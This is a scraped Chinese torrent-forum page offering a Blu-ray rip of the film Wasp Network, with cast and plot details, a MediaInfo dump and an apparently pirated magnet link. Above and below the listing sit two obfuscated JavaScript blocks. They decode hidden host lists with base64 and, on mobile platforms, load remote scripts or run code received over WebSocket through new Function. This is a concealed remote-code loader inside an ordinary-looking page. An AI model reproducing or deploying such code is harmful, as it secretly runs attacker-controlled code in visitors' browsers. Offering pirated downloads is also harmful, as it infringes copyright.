黄蜂网络[简繁字幕].Wasp.Network.2019.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 7.52GB

版主小s 21天前 241

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黄蜂网络 / 蜂起云涌(台)

◎片 名 Wasp Network

◎年 代 2019

◎产 地 法国 / 西班牙 / 比利时 / 巴西

◎类 别 惊悚

◎语 言 英语 / 西班牙语

◎上映日期 2019-09-01(威尼斯电影节) / 2020-06-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt6760876/

◎豆瓣评分 5.8/10 (893人评价)

◎豆瓣链接 https://movie.douban.com/subject/30204527/

◎片 长 127分钟

◎导 演 奥利维耶·阿萨亚斯 Olivier Assayas (id:1004899)

◎编 剧 奥利维耶·阿萨亚斯 Olivier Assayas (id:1004899)

◎演 员 安娜·德·阿玛斯 Ana de Armas (id:1045259)

佩内洛普·克鲁兹 Penélope Cruz (id:1005774)

阿德里娅·阿霍纳 Adria Arjona (id:1348880)

埃德加·拉米雷兹 édgar Ramírez (id:1000230)

瓦格纳·马拉 Wagner Moura (id:1009708)

盖尔·加西亚·贝纳尔 Gael García Bernal (id:1041009)

Steve Howard Steve Howard (id:1308179)

莱昂纳多·斯巴拉格利亚 Leonardo Sbaraglia (id:1010747)

胡里奥·加贝 Julio Gabay (id:1447138)

佩德罗·帕斯卡 Pedro Pascal (id:1329628)

约里克·勒·索克斯 Yorick Le Saux (id:1025529)

西蒙·雅克特 Simon Jacquet (id:1325049)

◎标 签 法国 / 2019 / 剧情 / 佩内洛普·克鲁兹 / 惊悚 / 奥利维耶·阿萨亚斯 / 安娜·德·阿玛斯 / 埃德加·拉米雷兹

◎简 介

20 世纪 90 年代初期,古巴飞行员瑞尼·贡萨雷斯(埃德加·拉米雷兹饰)叛逃到美国并开始了全新的自由生活,将他的妻子(佩内洛普·克鲁兹饰)和年幼的女儿留在了共产主义的祖国。但瑞尼并不只是一个简单的美国奋斗者新贵。他加入了南佛罗里达州的“黄蜂网络”。这个组织由一群古巴流放者组成,秘密特工曼努埃尔·韦拉蒙特斯(别名杰拉尔多·埃尔南德斯,盖尔·加西亚·贝纳尔饰演)领导。他成为亲卡斯特罗间谍圈的成员,负责监视和渗透古巴裔美国恐怖组织,这些组织企图攻击古巴这个社会主义共和国。

《黄蜂网络》根据“古巴五人组”(包括贡萨雷斯在内的情报官,于 1998 年 9 月在佛罗里达州被捕,随后因从事间谍活动和其他非法活动而被定罪)的真实故事改编,这是一部扣人心弦、风格独特的政治惊悚片,暗含多重深意,汇集了一群古巴国民和古巴裔美国流亡者,他们卷入了一场复杂而微妙的意识形态之...

◎获奖情况 (共2项)

第76届威尼斯电影节 (2019)

主竞赛单元 金狮奖 (提名)

└──奥利维耶·阿萨亚斯 (id:1004899)

第46届法国凯撒电影奖 (2021)

最佳改编剧本(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 131685955911201160412787819895469750201 (0x6311CAE628FA5F1CFE3F51F1A265B7B9)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.52 GiB

  8. Duration : 2 h 7 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 8 452 kb/s

  11. Encoded date : UTC 2021-11-10 08:13:38

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 7 min

  21. Bit rate : 4 924 kb/s

  22. Width : 1 920 pixels

  23. Height : 798 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.134

  31. Stream size : 4.38 GiB (58%)

  32. Title : HEVC, [email protected]@High, 24 fps @ 4605 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x798 / interlace=0 / total-frames=183529 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 2 h 7 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 464 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 3.08 GiB (41%)

  58. Title : Spanish DTS-HD Master Audio 5.1 @ 3464 kbps

  59. Language : Spanish

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 2 h 1 min

  68. Bit rate : 31.0 kb/s

  69. Count of elements : 3286

  70. Stream size : 27.0 MiB (0%)

  71. Title : Chs/SUP 简体

  72. Language : Chinese

  73. Default : Yes

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 2 h 1 min

  81. Bit rate : 31.8 kb/s

  82. Count of elements : 3286

  83. Stream size : 27.6 MiB (0%)

  84. Title : Cht/SUP 繁体

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Menu

  89. 00:00:00.000 : en:第 01 章

  90. 00:11:43.167 : en:第 02 章

  91. 00:22:08.125 : en:第 03 章

  92. 00:33:51.375 : en:第 04 章

  93. 00:43:50.458 : en:第 05 章

  94. 00:55:11.500 : en:第 06 章

  95. 01:09:41.833 : en:第 07 章

  96. 01:19:58.625 : en:第 08 章

  97. 01:29:03.500 : en:第 09 章

  98. 01:37:52.958 : en:第 10 章

  99. 01:48:37.750 : en:第 11 章

  100. 02:01:13.125 : en:第 12 章




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:F953072C2E336B4399229B5555B39B19986E7B6A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};